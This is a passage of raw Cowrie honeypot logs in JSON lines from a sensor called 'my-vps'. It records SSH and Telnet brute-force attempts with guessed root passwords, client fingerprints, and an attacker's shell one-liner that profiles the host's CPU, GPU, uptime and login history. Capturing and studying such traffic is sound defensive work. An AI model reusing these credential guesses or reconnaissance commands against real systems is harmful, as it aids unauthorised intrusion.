.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:42:15.305141Z","src_ip":"185.93.89.7","session":"761b63ccfe34"}
{"eventid":"cowrie.login.success","username":"root","password":"index123@","message":"login attempt [root/index123@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:42:15.364365Z","src_ip":"185.93.89.7","session":"761b63ccfe34"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:42:15.383240Z","src_ip":"185.93.89.7","session":"761b63ccfe34"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":59110,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e3a044a1fb6","protocol":"ssh","message":"New connection: 193.32.162.145:59110 (1.2.3.4:22) [session: 9e3a044a1fb6]","sensor":"my-vps","timestamp":"2025-08-28T08:42:16.280667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:42:16.281875Z","src_ip":"193.32.162.145","session":"9e3a044a1fb6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T08:42:16.312322Z","src_ip":"193.32.162.145","session":"9e3a044a1fb6"}
{"eventid":"cowrie.login.failed","username":"validator","password":"solana","message":"login attempt [validator/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T08:42:16.406055Z","src_ip":"193.32.162.145","session":"9e3a044a1fb6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:42:17.438698Z","src_ip":"193.32.162.145","session":"9e3a044a1fb6"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37390,"dst_ip":"1.2.3.4","dst_port":22,"session":"3527b69d81bb","protocol":"ssh","message":"New connection: 51.79.164.132:37390 (1.2.3.4:22) [session: 3527b69d81bb]","sensor":"my-vps","timestamp":"2025-08-28T08:42:20.269110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:42:20.582424Z","src_ip":"51.79.164.132","session":"3527b69d81bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:42:20.583283Z","src_ip":"51.79.164.132","session":"3527b69d81bb"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48064,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c3e7770f8f9","protocol":"ssh","message":"New connection: 185.93.89.7:48064 (1.2.3.4:22) [session: 8c3e7770f8f9]","sensor":"my-vps","timestamp":"2025-08-28T08:42:24.433743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:42:24.435396Z","src_ip":"185.93.89.7","session":"8c3e7770f8f9"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:42:24.452018Z","src_ip":"185.93.89.7","session":"8c3e7770f8f9"}
{"eventid":"cowrie.login.success","username":"root","password":"Index123@","message":"login attempt [root/Index123@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:42:24.506097Z","src_ip":"185.93.89.7","session":"8c3e7770f8f9"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:42:24.526886Z","src_ip":"185.93.89.7","session":"8c3e7770f8f9"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:42:24.991788Z","src_ip":"51.79.164.132","session":"3527b69d81bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:42:26.341993Z","src_ip":"51.79.164.132","session":"3527b69d81bb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:42:26.342848Z","src_ip":"51.79.164.132","session":"3527b69d81bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:42:27.221258Z","src_ip":"51.79.164.132","session":"3527b69d81bb"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:42:27.222477Z","src_ip":"51.79.164.132","session":"3527b69d81bb"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45166,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d8142117ca8","protocol":"ssh","message":"New connection: 51.79.164.132:45166 (1.2.3.4:22) [session: 4d8142117ca8]","sensor":"my-vps","timestamp":"2025-08-28T08:42:47.451825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:42:48.017040Z","src_ip":"51.79.164.132","session":"4d8142117ca8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:42:48.017785Z","src_ip":"51.79.164.132","session":"4d8142117ca8"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:42:51.041480Z","src_ip":"51.79.164.132","session":"4d8142117ca8"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:42:52.330173Z","src_ip":"51.79.164.132","session":"4d8142117ca8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45266,"dst_ip":"1.2.3.4","dst_port":22,"session":"553781cdeaec","protocol":"ssh","message":"New connection: 212.227.235.229:45266 (1.2.3.4:22) [session: 553781cdeaec]","sensor":"my-vps","timestamp":"2025-08-28T08:42:53.876625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:42:55.163417Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:42:55.164070Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50684,"dst_ip":"1.2.3.4","dst_port":22,"session":"578fb0577ecb","protocol":"ssh","message":"New connection: 185.93.89.7:50684 (1.2.3.4:22) [session: 578fb0577ecb]","sensor":"my-vps","timestamp":"2025-08-28T08:43:02.057265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:43:02.065718Z","src_ip":"185.93.89.7","session":"578fb0577ecb"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:43:02.077116Z","src_ip":"185.93.89.7","session":"578fb0577ecb"}
{"eventid":"cowrie.login.success","username":"root","password":"index@123","message":"login attempt [root/index@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:43:02.135908Z","src_ip":"185.93.89.7","session":"578fb0577ecb"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:02.155930Z","src_ip":"185.93.89.7","session":"578fb0577ecb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47600,"dst_ip":"1.2.3.4","dst_port":23,"session":"a92207451c12","protocol":"telnet","message":"New connection: 212.227.125.160:47600 (1.2.3.4:23) [session: a92207451c12]","sensor":"my-vps","timestamp":"2025-08-28T08:43:02.341508Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:43:03.776010Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":47282,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5ccef79f73e","protocol":"ssh","message":"New connection: 139.19.117.131:47282 (1.2.3.4:22) [session: b5ccef79f73e]","sensor":"my-vps","timestamp":"2025-08-28T08:43:05.299610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:43:05.300319Z","src_ip":"139.19.117.131","session":"b5ccef79f73e"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T08:43:05.318419Z","src_ip":"139.19.117.131","session":"b5ccef79f73e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"08:a1:79:cd:48:af:ba:4f:0b:ad:05:95:e7:a5:6f:ba","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPHzdNlwPXB6eFWisaAjjmNgHrmZWlAuNAg6eenQIDzX","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 08:a1:79:cd:48:af:ba:4f:0b:ad:05:95:e7:a5:6f:ba","sensor":"my-vps","timestamp":"2025-08-28T08:43:05.356748Z","src_ip":"139.19.117.131","session":"b5ccef79f73e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"08:a1:79:cd:48:af:ba:4f:0b:ad:05:95:e7:a5:6f:ba","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPHzdNlwPXB6eFWisaAjjmNgHrmZWlAuNAg6eenQIDzX","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T08:43:05.357429Z","src_ip":"139.19.117.131","session":"b5ccef79f73e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:43:06.386368Z","src_ip":"212.227.235.229","session":"553781cdeaec"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; 